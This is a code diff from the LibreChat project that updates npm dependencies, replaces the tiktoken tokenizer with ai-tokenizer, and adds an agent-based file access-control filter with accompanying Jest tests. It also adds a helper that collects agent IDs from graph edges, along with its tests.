"integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==", "integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=16.9.0" "node": ">=16.9.0"
@ -35688,18 +35784,6 @@
"node-readable-to-web-readable-stream": "^0.4.2" "node-readable-to-web-readable-stream": "^0.4.2"
} }
}, },
"node_modules/peek-readable": {
"version": "5.0.0",
"resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz",
"integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==",
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/pend": { "node_modules/pend": {
"version": "1.2.0", "version": "1.2.0",
"resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz",
@ -38505,21 +38589,6 @@
"node": ">= 6" "node": ">= 6"
} }
}, },
"node_modules/readable-web-to-node-stream": {
"version": "3.0.2",
"resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz",
"integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==",
"dependencies": {
"readable-stream": "^3.6.0"
},
"engines": {
"node": ">=8"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/readdirp": { "node_modules/readdirp": {
"version": "3.6.0", "version": "3.6.0",
"resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz",
@ -40906,22 +40975,6 @@
], ],
"license": "MIT" "license": "MIT"
}, },
"node_modules/strtok3": {
"version": "7.0.0",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz",
"integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"peek-readable": "^5.0.0"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/style-inject": { "node_modules/style-inject": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz", "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz",
@ -41485,11 +41538,6 @@
"node": ">=0.8" "node": ">=0.8"
} }
}, },
"node_modules/tiktoken": {
"version": "1.0.15",
"resolved": "https://registry.npmjs.org/tiktoken/-/tiktoken-1.0.15.tgz",
"integrity": "sha512-sCsrq/vMWUSEW29CJLNmPvWxlVp7yh2tlkAjpJltIKqp5CKf98ZNpdeHRmAlPVFlGEbswDc6SmI8vz64W/qErw=="
},
"node_modules/timers-browserify": { "node_modules/timers-browserify": {
"version": "2.0.12", "version": "2.0.12",
"resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz", "resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz",
@ -41631,22 +41679,6 @@
"node": ">=0.6" "node": ">=0.6"
} }
}, },
"node_modules/token-types": {
"version": "5.0.1",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz",
"integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/touch": { "node_modules/touch": {
"version": "3.1.0", "version": "3.1.0",
"resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz",
@ -42197,6 +42229,18 @@
"resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz",
"integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA=="
}, },
"node_modules/uint8array-extras": {
"version": "1.5.0",
"resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz",
"integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==",
"license": "MIT",
"engines": {
"node": ">=18"
},
"funding": {
"url": "https://github.com/sponsors/sindresorhus"
}
},
"node_modules/unbox-primitive": { "node_modules/unbox-primitive": {
"version": "1.1.0", "version": "1.1.0",
"resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz",
@ -42229,9 +42273,9 @@
"license": "MIT" "license": "MIT"
}, },
"node_modules/undici": { "node_modules/undici": {
"version": "7.20.0", "version": "7.24.1",
"resolved": "https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz",
"integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=20.18.1" "node": ">=20.18.1"
@ -44088,9 +44132,9 @@
} }
}, },
"node_modules/yauzl": { "node_modules/yauzl": {
"version": "3.2.0", "version": "3.2.1",
"resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz", "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz",
"integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==", "integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==",
"dev": true, "dev": true,
"license": "MIT", "license": "MIT",
"dependencies": { "dependencies": {
@ -44196,10 +44240,11 @@
"@google/genai": "^1.19.0", "@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3", "@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80", "@langchain/core": "^0.3.80",
"@librechat/agents": "^3.1.55", "@librechat/agents": "^3.1.56",
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"connect-redis": "^8.1.0", "connect-redis": "^8.1.0",
"eventsource": "^3.0.2", "eventsource": "^3.0.2",
@ -44222,8 +44267,7 @@
"node-fetch": "2.7.0", "node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"tiktoken": "^1.0.15", "undici": "^7.24.1",
"undici": "^7.18.2",
"zod": "^3.22.4" "zod": "^3.22.4"
} }
}, },

View file

@ -7,6 +7,7 @@ export default {
'\\.dev\\.ts$', '\\.dev\\.ts$',
'\\.helper\\.ts$', '\\.helper\\.ts$',
'\\.helper\\.d\\.ts$', '\\.helper\\.d\\.ts$',
'/__tests__/helpers/',
], ],
coverageReporters: ['text', 'cobertura'], coverageReporters: ['text', 'cobertura'],
testResultsProcessor: 'jest-junit', testResultsProcessor: 'jest-junit',

View file

@ -18,8 +18,8 @@
"build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs", "build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs",
"build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs", "build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs",
"build:watch:prod": "rollup -c -w --bundleConfigAsCjs", "build:watch:prod": "rollup -c -w --bundleConfigAsCjs",
"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"", "test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"", "test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
"test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false", "test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
"test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand", "test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand",
"test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false", "test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
@ -90,10 +90,11 @@
"@google/genai": "^1.19.0", "@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3", "@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80", "@langchain/core": "^0.3.80",
"@librechat/agents": "^3.1.55", "@librechat/agents": "^3.1.56",
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"connect-redis": "^8.1.0", "connect-redis": "^8.1.0",
"eventsource": "^3.0.2", "eventsource": "^3.0.2",
@ -116,8 +117,7 @@
"node-fetch": "2.7.0", "node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"tiktoken": "^1.0.15", "undici": "^7.24.1",
"undici": "^7.18.2",
"zod": "^3.22.4" "zod": "^3.22.4"
} }
} }

View file

@ -22,8 +22,9 @@ jest.mock('winston', () => ({
})); }));
// Mock the Tokenizer // Mock the Tokenizer
jest.mock('~/utils', () => ({ jest.mock('~/utils/tokenizer', () => ({
Tokenizer: { __esModule: true,
default: {
getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token
}, },
})); }));

View file

@ -1,5 +1,11 @@
import type { GraphEdge } from 'librechat-data-provider'; import type { GraphEdge } from 'librechat-data-provider';
import { getEdgeKey, getEdgeParticipants, filterOrphanedEdges, createEdgeCollector } from './edges'; import {
getEdgeKey,
getEdgeParticipants,
collectEdgeAgentIds,
filterOrphanedEdges,
createEdgeCollector,
} from './edges';
describe('edges utilities', () => { describe('edges utilities', () => {
describe('getEdgeKey', () => { describe('getEdgeKey', () => {
@ -70,6 +76,49 @@ describe('edges utilities', () => {
}); });
}); });
describe('collectEdgeAgentIds', () => {
it('should return empty set for undefined input', () => {
expect(collectEdgeAgentIds(undefined)).toEqual(new Set());
});
it('should return empty set for empty array', () => {
expect(collectEdgeAgentIds([])).toEqual(new Set());
});
it('should collect IDs from simple string from/to', () => {
const edges: GraphEdge[] = [{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }];
expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b']));
});
it('should collect IDs from array from/to values', () => {
const edges: GraphEdge[] = [
{ from: ['agent_a', 'agent_b'], to: ['agent_c', 'agent_d'], edgeType: 'handoff' },
];
expect(collectEdgeAgentIds(edges)).toEqual(
new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d']),
);
});
it('should deduplicate IDs across edges', () => {
const edges: GraphEdge[] = [
{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' },
{ from: 'agent_b', to: 'agent_c', edgeType: 'handoff' },
{ from: 'agent_a', to: 'agent_c', edgeType: 'direct' },
];
expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b', 'agent_c']));
});
it('should handle mixed scalar and array edges', () => {
const edges: GraphEdge[] = [
{ from: 'agent_a', to: ['agent_b', 'agent_c'], edgeType: 'handoff' },
{ from: ['agent_c', 'agent_d'], to: 'agent_e', edgeType: 'direct' },
];
expect(collectEdgeAgentIds(edges)).toEqual(
new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d', 'agent_e']),
);
});
});
describe('filterOrphanedEdges', () => { describe('filterOrphanedEdges', () => {
const edges: GraphEdge[] = [ const edges: GraphEdge[] = [
{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }, { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' },

View file

@ -43,6 +43,20 @@ export function filterOrphanedEdges(edges: GraphEdge[], skippedAgentIds: Set<str
}); });
} }
/** Collects all unique agent IDs referenced across an array of edges. */
export function collectEdgeAgentIds(edges: GraphEdge[] | undefined): Set<string> {
const ids = new Set<string>();
if (!edges || edges.length === 0) {
return ids;
}
for (const edge of edges) {
for (const id of getEdgeParticipants(edge)) {
ids.add(id);
}
}
return ids;
}
/** /**
* Result of discovering and aggregating edges from connected agents. * Result of discovering and aggregating edges from connected agents.
*/ */

View file

@ -31,6 +31,7 @@ import { filterFilesByEndpointConfig } from '~/files';
import { generateArtifactsPrompt } from '~/prompts'; import { generateArtifactsPrompt } from '~/prompts';
import { getProviderConfig } from '~/endpoints'; import { getProviderConfig } from '~/endpoints';
import { primeResources } from './resources'; import { primeResources } from './resources';
import type { TFilterFilesByAgentAccess } from './resources';
/** /**
* Extended agent type with additional fields needed after initialization * Extended agent type with additional fields needed after initialization
@ -52,6 +53,8 @@ export type InitializedAgent = Agent & {
toolDefinitions?: LCTool[]; toolDefinitions?: LCTool[];
/** Precomputed flag indicating if any tools have defer_loading enabled (for efficient runtime checks) */ /** Precomputed flag indicating if any tools have defer_loading enabled (for efficient runtime checks) */
hasDeferredTools?: boolean; hasDeferredTools?: boolean;
/** Whether the actions capability is enabled (resolved during tool loading) */
actionsEnabled?: boolean;
}; };
/** /**
@ -90,6 +93,7 @@ export interface InitializeAgentParams {
/** Serializable tool definitions for event-driven mode */ /** Serializable tool definitions for event-driven mode */
toolDefinitions?: LCTool[]; toolDefinitions?: LCTool[];
hasDeferredTools?: boolean; hasDeferredTools?: boolean;
actionsEnabled?: boolean;
} | null>; } | null>;
/** Endpoint option (contains model_parameters and endpoint info) */ /** Endpoint option (contains model_parameters and endpoint info) */
endpointOption?: Partial<TEndpointOption>; endpointOption?: Partial<TEndpointOption>;
@ -108,7 +112,9 @@ export interface InitializeAgentDbMethods extends EndpointDbMethods {
/** Update usage tracking for multiple files */ /** Update usage tracking for multiple files */
updateFilesUsage: (files: Array<{ file_id: string }>, fileIds?: string[]) => Promise<unknown[]>; updateFilesUsage: (files: Array<{ file_id: string }>, fileIds?: string[]) => Promise<unknown[]>;
/** Get files from database */ /** Get files from database */
getFiles: (filter: unknown, sort: unknown, select: unknown, opts?: unknown) => Promise<unknown[]>; getFiles: (filter: unknown, sort: unknown, select: unknown) => Promise<unknown[]>;
/** Filter files by agent access permissions (ownership or agent attachment) */
filterFilesByAgentAccess?: TFilterFilesByAgentAccess;
/** Get tool files by IDs (user-uploaded files only, code files handled separately) */ /** Get tool files by IDs (user-uploaded files only, code files handled separately) */
getToolFilesByIds: (fileIds: string[], toolSet: Set<EToolResources>) => Promise<unknown[]>; getToolFilesByIds: (fileIds: string[], toolSet: Set<EToolResources>) => Promise<unknown[]>;
/** Get conversation file IDs */ /** Get conversation file IDs */
@ -268,6 +274,7 @@ export async function initializeAgent(
const { attachments: primedAttachments, tool_resources } = await primeResources({ const { attachments: primedAttachments, tool_resources } = await primeResources({
req: req as never, req: req as never,
getFiles: db.getFiles as never, getFiles: db.getFiles as never,
filterFiles: db.filterFilesByAgentAccess,
appConfig: req.config, appConfig: req.config,
agentId: agent.id, agentId: agent.id,
attachments: currentFiles attachments: currentFiles
@ -283,6 +290,7 @@ export async function initializeAgent(
userMCPAuthMap, userMCPAuthMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
tools: structuredTools, tools: structuredTools,
} = (await loadTools?.({ } = (await loadTools?.({
req, req,
@ -300,6 +308,7 @@ export async function initializeAgent(
toolRegistry: undefined, toolRegistry: undefined,
toolDefinitions: [], toolDefinitions: [],
hasDeferredTools: false, hasDeferredTools: false,
actionsEnabled: undefined,
}; };
const { getOptions, overrideProvider } = getProviderConfig({ const { getOptions, overrideProvider } = getProviderConfig({
@ -409,6 +418,7 @@ export async function initializeAgent(
userMCPAuthMap, userMCPAuthMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
attachments: finalAttachments, attachments: finalAttachments,
toolContextMap: toolContextMap ?? {}, toolContextMap: toolContextMap ?? {},
useLegacyContent: !!options.useLegacyContent, useLegacyContent: !!options.useLegacyContent,

View file

@ -19,7 +19,8 @@ import type { TAttachment, MemoryArtifact } from 'librechat-data-provider';
import type { BaseMessage, ToolMessage } from '@langchain/core/messages'; import type { BaseMessage, ToolMessage } from '@langchain/core/messages';
import type { Response as ServerResponse } from 'express'; import type { Response as ServerResponse } from 'express';
import { GenerationJobManager } from '~/stream/GenerationJobManager'; import { GenerationJobManager } from '~/stream/GenerationJobManager';
import { Tokenizer, resolveHeaders, createSafeUser } from '~/utils'; import { resolveHeaders, createSafeUser } from '~/utils';
import Tokenizer from '~/utils/tokenizer';
type RequiredMemoryMethods = Pick< type RequiredMemoryMethods = Pick<
MemoryMethods, MemoryMethods,

View file

@ -4,7 +4,7 @@ import { EModelEndpoint, EToolResources, AgentCapabilities } from 'librechat-dat
import type { TAgentsEndpoint, TFile } from 'librechat-data-provider'; import type { TAgentsEndpoint, TFile } from 'librechat-data-provider';
import type { IUser, AppConfig } from '@librechat/data-schemas'; import type { IUser, AppConfig } from '@librechat/data-schemas';
import type { Request as ServerRequest } from 'express'; import type { Request as ServerRequest } from 'express';
import type { TGetFiles } from './resources'; import type { TGetFiles, TFilterFilesByAgentAccess } from './resources';
// Mock logger // Mock logger
jest.mock('@librechat/data-schemas', () => ({ jest.mock('@librechat/data-schemas', () => ({
@ -17,16 +17,16 @@ describe('primeResources', () => {
let mockReq: ServerRequest & { user?: IUser }; let mockReq: ServerRequest & { user?: IUser };
let mockAppConfig: AppConfig; let mockAppConfig: AppConfig;
let mockGetFiles: jest.MockedFunction<TGetFiles>; let mockGetFiles: jest.MockedFunction<TGetFiles>;
let mockFilterFiles: jest.MockedFunction<TFilterFilesByAgentAccess>;
let requestFileSet: Set<string>; let requestFileSet: Set<string>;
beforeEach(() => { beforeEach(() => {
// Reset mocks
jest.clearAllMocks(); jest.clearAllMocks();
// Setup mock request mockReq = {
mockReq = {} as unknown as ServerRequest & { user?: IUser }; user: { id: 'user1', role: 'USER' },
} as unknown as ServerRequest & { user?: IUser };
// Setup mock appConfig
mockAppConfig = { mockAppConfig = {
endpoints: { endpoints: {
[EModelEndpoint.agents]: { [EModelEndpoint.agents]: {
@ -35,10 +35,9 @@ describe('primeResources', () => {
}, },
} as AppConfig; } as AppConfig;
// Setup mock getFiles function
mockGetFiles = jest.fn(); mockGetFiles = jest.fn();
mockFilterFiles = jest.fn().mockImplementation(({ files }) => Promise.resolve(files));
// Setup request file set
requestFileSet = new Set(['file1', 'file2', 'file3']); requestFileSet = new Set(['file1', 'file2', 'file3']);
}); });
@ -70,20 +69,21 @@ describe('primeResources', () => {
req: mockReq, req: mockReq,
appConfig: mockAppConfig, appConfig: mockAppConfig,
getFiles: mockGetFiles, getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet, requestFileSet,
attachments: undefined, attachments: undefined,
tool_resources, tool_resources,
agentId: 'agent_test',
}); });
expect(mockGetFiles).toHaveBeenCalledWith( expect(mockGetFiles).toHaveBeenCalledWith({ file_id: { $in: ['ocr-file-1'] } }, {}, {});
{ file_id: { $in: ['ocr-file-1'] } }, expect(mockFilterFiles).toHaveBeenCalledWith({
{}, files: mockOcrFiles,
{}, userId: 'user1',
{ userId: undefined, agentId: undefined }, role: 'USER',
); agentId: 'agent_test',
});
expect(result.attachments).toEqual(mockOcrFiles); expect(result.attachments).toEqual(mockOcrFiles);
// Context field is deleted after files are fetched and re-categorized
// Since the file is not embedded and has no special properties, it won't be categorized
expect(result.tool_resources).toEqual({}); expect(result.tool_resources).toEqual({});
}); });
}); });
@ -1108,12 +1108,10 @@ describe('primeResources', () => {
'ocr-file-1', 'ocr-file-1',
); );
// Verify getFiles was called with merged file_ids
expect(mockGetFiles).toHaveBeenCalledWith( expect(mockGetFiles).toHaveBeenCalledWith(
{ file_id: { $in: ['context-file-1', 'ocr-file-1'] } }, { file_id: { $in: ['context-file-1', 'ocr-file-1'] } },
{}, {},
{}, {},
{ userId: undefined, agentId: undefined },
); );
}); });
@ -1241,6 +1239,249 @@ describe('primeResources', () => {
}); });
}); });
describe('access control filtering', () => {
it('should filter context files through filterFiles when provided', async () => {
const ownedFile: TFile = {
user: 'user1',
file_id: 'owned-file',
filename: 'owned.pdf',
filepath: '/uploads/owned.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
const inaccessibleFile: TFile = {
user: 'other-user',
file_id: 'inaccessible-file',
filename: 'secret.pdf',
filepath: '/uploads/secret.pdf',
object: 'file',
type: 'application/pdf',
bytes: 2048,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([ownedFile, inaccessibleFile]);
mockFilterFiles.mockResolvedValue([ownedFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['owned-file', 'inaccessible-file'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_shared',
});
expect(mockFilterFiles).toHaveBeenCalledWith({
files: [ownedFile, inaccessibleFile],
userId: 'user1',
role: 'USER',
agentId: 'agent_shared',
});
expect(result.attachments).toEqual([ownedFile]);
expect(result.attachments).not.toContainEqual(inaccessibleFile);
});
it('should filter OCR files merged into context through filterFiles', async () => {
const ocrFile: TFile = {
user: 'other-user',
file_id: 'ocr-restricted',
filename: 'scan.pdf',
filepath: '/uploads/scan.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([ocrFile]);
mockFilterFiles.mockResolvedValue([]);
const tool_resources = {
[EToolResources.ocr]: {
file_ids: ['ocr-restricted'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_shared',
});
expect(mockFilterFiles).toHaveBeenCalledWith({
files: [ocrFile],
userId: 'user1',
role: 'USER',
agentId: 'agent_shared',
});
expect(result.attachments).toBeUndefined();
});
it('should skip filtering when filterFiles is not provided', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
it('should skip filtering when user ID is missing', async () => {
const reqNoUser = {} as unknown as ServerRequest & { user?: IUser };
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: reqNoUser,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
it('should gracefully handle filterFiles rejection', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
mockFilterFiles.mockRejectedValue(new Error('DB failure'));
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(logger.error).toHaveBeenCalledWith('Error priming resources', expect.any(Error));
expect(result.tool_resources).toEqual(tool_resources);
});
it('should skip filtering when agentId is missing', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
});
describe('edge cases', () => { describe('edge cases', () => {
it('should handle missing appConfig agents endpoint gracefully', async () => { it('should handle missing appConfig agents endpoint gracefully', async () => {
const reqWithoutLocals = {} as ServerRequest & { user?: IUser }; const reqWithoutLocals = {} as ServerRequest & { user?: IUser };

View file

@ -10,16 +10,26 @@ import type { Request as ServerRequest } from 'express';
* @param filter - MongoDB filter query for files * @param filter - MongoDB filter query for files
* @param _sortOptions - Sorting options (currently unused) * @param _sortOptions - Sorting options (currently unused)
* @param selectFields - Field selection options * @param selectFields - Field selection options
* @param options - Additional options including userId and agentId for access control
* @returns Promise resolving to array of files * @returns Promise resolving to array of files
*/ */
export type TGetFiles = ( export type TGetFiles = (
filter: FilterQuery<IMongoFile>, filter: FilterQuery<IMongoFile>,
_sortOptions: ProjectionType<IMongoFile> | null | undefined, _sortOptions: ProjectionType<IMongoFile> | null | undefined,
selectFields: QueryOptions<IMongoFile> | null | undefined, selectFields: QueryOptions<IMongoFile> | null | undefined,
options?: { userId?: string; agentId?: string },
) => Promise<Array<TFile>>; ) => Promise<Array<TFile>>;
/**
* Function type for filtering files by agent access permissions.
* Used to enforce that only files the user has access to (via ownership or agent attachment)
* are returned after a raw DB query.
*/
export type TFilterFilesByAgentAccess = (params: {
files: Array<TFile>;
userId: string;
role?: string;
agentId: string;
}) => Promise<Array<TFile>>;
/** /**
* Helper function to add a file to a specific tool resource category * Helper function to add a file to a specific tool resource category
* Prevents duplicate files within the same resource category * Prevents duplicate files within the same resource category
@ -128,7 +138,7 @@ const categorizeFileForToolResources = ({
/** /**
* Primes resources for agent execution by processing attachments and tool resources * Primes resources for agent execution by processing attachments and tool resources
* This function: * This function:
* 1. Fetches OCR files if OCR is enabled * 1. Fetches context/OCR files (filtered by agent access control when available)
* 2. Processes attachment files * 2. Processes attachment files
* 3. Categorizes files into appropriate tool resources * 3. Categorizes files into appropriate tool resources
* 4. Prevents duplicate files across all sources * 4. Prevents duplicate files across all sources
@ -137,15 +147,18 @@ const categorizeFileForToolResources = ({
* @param params.req - Express request object * @param params.req - Express request object
* @param params.appConfig - Application configuration object * @param params.appConfig - Application configuration object
* @param params.getFiles - Function to retrieve files from database * @param params.getFiles - Function to retrieve files from database
* @param params.filterFiles - Optional function to enforce agent-based file access control
